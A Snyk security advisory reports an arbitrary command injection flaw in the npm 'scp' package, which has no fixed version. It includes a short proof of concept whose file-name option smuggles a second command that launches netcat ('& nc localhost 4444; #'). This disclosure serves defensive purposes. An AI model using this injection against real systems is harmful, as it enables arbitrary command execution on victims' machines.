Arbitrary Command Injection Affecting scp package, versions *
Snyk CVSS
Exploit Maturity
Proof of concept
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Integrity
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SCP-1009828
- published 21 Jun 2020
- disclosed 7 May 2020
- credit Mik317
How to fix?
There is no fixed version for scp
.
Overview
Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user input is formatted inside a command
that will be executed without any checks.
PoC By Snyk Security Team
var scp = require('scp');
var options = {
file: '& nc localhost 4444; #',
user: 'username',
host: 'myServer',
port: '20',
path: '~'
}
scp.send(options, function (err) {
if (err) console.log(err);
else console.log('File transferred.');
});